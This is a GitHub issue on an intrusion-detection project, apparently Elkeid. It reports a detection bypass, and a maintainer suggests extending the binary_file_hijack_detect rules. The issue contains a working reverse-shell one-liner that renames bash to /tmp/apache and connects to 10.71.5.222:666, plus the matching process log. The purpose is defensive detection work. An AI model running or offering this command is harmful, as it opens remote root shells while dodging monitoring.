We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
麻烦评估下这个 规则改动,
#4
cp /bin/bash /tmp/apache;/tmp/apache -i >& /dev/tcp/10.71.5.222/666 0>&1
{ "bootTime":"2022-01-19 18:48:20.000", "cmdline":"/tmp/apache -i", "cwd":"/", "exe":"/tmp/apache", "fd_num":"3", "name":"apache", "pid":"88184", "ppid":"50250", "r_addr_ip":"10.71.5.222", "r_addr_port":"666", "session":"50250", "stderr":"socket:[583190616]", "stdin":"socket:[583190616]", "stdout":"socket:[583190616]", "terminal":"/pts/0", "username":"root" },
The text was updated successfully, but these errors were encountered:
Hi, 这个问题非常赞,类似情况的绕过需要作为规则集的一部分进行检出。 事实上我们也是这么做的,而当前开源的规则集只是我们实际上商用版本的一小部分。 这里建议您可以自行添加,参考开源规则中的binary_file_hijack_detect 系列将对类似的文件替换进行修改。 如果有好的结论可以提交merge request,我们会协助测试并合并进来
binary_file_hijack_detect
感谢您的关注 Elkeid Team
Sorry, something went wrong.
No branches or pull requests
麻烦评估下这个 规则改动,
#4
cp /bin/bash /tmp/apache;/tmp/apache -i >& /dev/tcp/10.71.5.222/666 0>&1
{
"bootTime":"2022-01-19 18:48:20.000",
"cmdline":"/tmp/apache -i",
"cwd":"/",
"exe":"/tmp/apache",
"fd_num":"3",
"name":"apache",
"pid":"88184",
"ppid":"50250",
"r_addr_ip":"10.71.5.222",
"r_addr_port":"666",
"session":"50250",
"stderr":"socket:[583190616]",
"stdin":"socket:[583190616]",
"stdout":"socket:[583190616]",
"terminal":"/pts/0",
"username":"root"
},
The text was updated successfully, but these errors were encountered: